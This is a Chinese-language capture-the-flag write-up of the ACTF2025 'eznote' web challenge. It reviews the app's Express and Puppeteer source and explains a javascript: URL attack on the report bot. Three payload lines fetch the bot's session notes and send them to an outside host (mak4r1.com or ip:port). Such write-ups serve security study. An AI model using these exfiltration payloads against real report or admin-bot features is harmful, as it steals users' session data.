ACTF2025-web-eznote-wp

附件审计

app.js

const express = require('express')
const session = require('express-session') // 会话管理中间件
const { randomBytes } = require('crypto') // 生成加密随机数
const fs = require('fs') // 文件系统操作
const spawn = require('child_process') // 执行外部命令（如调用 Pandoc）
const path = require('path') // 路径处理
const { visit } = require('./bot') // 自定义爬虫模块（用于/report路由）
const createDOMPurify = require('dompurify'); // HTML 净化库const { JSDOM } = require('jsdom'); // 提供 DOM 环境const DOMPurify = createDOMPurify(new JSDOM('').window);  const LISTEN_PORT = 3000  
const LISTEN_HOST = '0.0.0.0'  const app = express()  app.set('views', './views') // 模板目录
app.set('view engine', 'html') // - 这行代码设置了应用的视图引擎。'view engine' 是一个配置项的键，'html' 是对应的值，表示应用将使用 html 作为视图模板的扩展名。通常，这会配合视图引擎（如 ejs）来解析 .html 文件。
app.engine('html', require('ejs').renderFile) // - 这行代码注册了一个视图引擎。'html' 是视图模板的扩展名，require('ejs').renderFile 是一个函数，表示当应用需要渲染 .html 文件时，将使用 ejs 模板引擎来解析这些文件。ejs 是一个流行的模板引擎，允许在 HTML 文件中嵌入 JavaScript 代码。
app.use(express.urlencoded({ extended: true })) // 解析表单数据
//“.use()”是Express.js框架中用于挂载中间件的方法。它允许开发者在请求处理流程中插入自定义的逻辑或功能。
app.use(session({secret: randomBytes(4).toString('hex'), // 动态生成密钥（生产环境应固定）saveUninitialized: true, // 表示即使会话（session）尚未被初始化（即没有任何数据被存储到 session 中），也会将这个空的 session 保存到存储器（比如内存、数据库等）中。resave: true, // 强制重新保存会话
}))app.use((req, res, next) => {if (!req.session.notes) {req.session.notes = [] // 初始化会话中的笔记 ID 数组}next() // 传递控制权
})const notes = new Map() // 内存存储笔记（键为 noteId，值为笔记内容） setInterval(() => { notes.clear() }, 60 * 1000);  // 每分钟清空笔记（防内存泄漏） “setInterval”是JavaScript中一个很重要的函数，用于在指定的毫秒数后重复执行指定的函数，直到被清除。function toHtml(source, format) {if (format == undefined) format = 'markdown';let tmpfile = path.join('notes', randomBytes(4).toString('hex'));fs.writeFileSync(tmpfile, source); // 将内容写入临时文件let res = spawn.execSync(`pandoc -f ${format} ${tmpfile}`).toString(); // 调用 Pandoc 转换格式return DOMPurify.sanitize(res); // DOMPurify.sanitize(res)，对转换后的 HTML 内容进行净化，确保其安全性，再将净化后的结果返回。
} app.get('/ping', (req, res) => {  res.send('pong')  
})  app.get('/', (req, res) => {  res.render('index', { notes: req.session.notes })  
})  app.get('/notes', (req, res) => {  res.send(req.session.notes)  
})  app.get('/note/:noteId', (req, res) => {  let { noteId } = req.params  if(!notes.has(noteId)){  res.send('no such note')  return  }   let note = notes.get(noteId)  res.render('note', note)  
})  app.post('/note', (req, res) => {  let noteId = randomBytes(8).toString('hex')  let { title, content, format } = req.body  if (!/^[0-9a-zA-Z]{1,10}$/.test(format)) {  res.send("illegal format!!!")  return  }  notes.set(noteId, {  title: title,  content: toHtml(content, format)  //净化好的html文件内容会储存在 notes这个全局变量中 })  req.session.notes.push(noteId)  res.send(noteId)  
})  app.get('/report', (req, res) => {  res.render('report')  
})  app.post('/report', async (req, res) => {  let { url } = req.body  try {  await visit(url)  res.send('success')  } catch (err) {  console.log(err)  res.send('error')  }  
})  app.listen(LISTEN_PORT, LISTEN_HOST, () => {  console.log(`listening on ${LISTEN_HOST}:${LISTEN_PORT}`)  
})

bot.js

const puppeteer = require('puppeteer')
const process = require('process')
const fs = require('fs')const FLAG = (() => {let flag = 'flag{test}'if (fs.existsSync('flag.txt')){flag = fs.readFileSync('flag.txt').toString()fs.unlinkSync('flag.txt')} return flag
})()const HEADLESS = !!(process.env.PROD ?? false)const sleep = (sec) => new Promise(r => setTimeout(r, sec * 1000))async function visit(url) {let browser = await puppeteer.launch({headless: HEADLESS,executablePath: '/usr/bin/chromium',args: ['--no-sandbox'],})let page = await browser.newPage()await page.goto('http://localhost:3000/')await page.waitForSelector('#title')await page.type('#title', 'flag', {delay: 100})await page.type('#content', FLAG, {delay: 100})await page.click('#submit', {delay: 100})await sleep(3)console.log('visiting %s', url)await page.goto(url)await sleep(30)await browser.close()
}module.exports = {visit
}

解题思路

我们看到，bot.js文件中，visit方法会利用这个搭建的笔记程序，自行配置浏览器将flag写入，笔记的写入逻辑我们可以在app.js中看到（这里可以结合附件中的index.html理解，bot访问的是根路由，
根路由渲染的是index）

写入笔记逻辑：

app.post('/note', (req, res) => {let noteId = randomBytes(8).toString('hex') // 生成唯一ID// 存储到全局Mapnotes.set(noteId, {title: title,content: toHtml(content, format)})// 存储ID到用户会话req.session.notes.push(noteId)res.send(noteId)
})

这里会把 noteId 写入 session.notes 数组中

bot的visit自动写入flag后，才用page.goto 继续执行 我们传入的url

要清楚一点是：bot写flag这个笔记时，创建了属于这个会话的session

它使用page.goto处理我们的url

我们注意到app.js中：

notes路由是会“响应” notes 的（这是可以得到noteId的）

我们知道session这东西是每个用户独立的，而这里的page.goto支持JavaScript伪协议
那我们就可以利用这一点
搞一些同一个session上下文的“奇妙事情”

到这里思路就很清晰了：
利用JavaScript的fetch把session异步请求到我们的vps，从而获取flag笔记的noteId，再用拿到的noteId，通过请求/note/:noteId路由，获取储存在 notes （const notes = new Map()）这个全局变量中的 flag的内容

paylpad：
/report路由

javascript:fetch('http://localhost:3000/notes').then(r=>r.text()).then(t=>location.href='http://mak4r1.com:3333?c='+encodeURIComponent(t))

或

javascript:fetch('http://ip:port/?flag='+(document.body.innerText))

或

javascript:fetch('/notes').then(r=>r.text()).then(d=>navigator.sendBeacon('http://ip:port/',d))

攻击流程说明

参考文章

ACTF2025 WriteUp – Mak的小破站 (mak4r1.com)

ACTF2025 Web Writeup-先知社区 (aliyun.com)

2025 ACTF Web 复现 - 妙尽璇机 (changeyourway.github.io)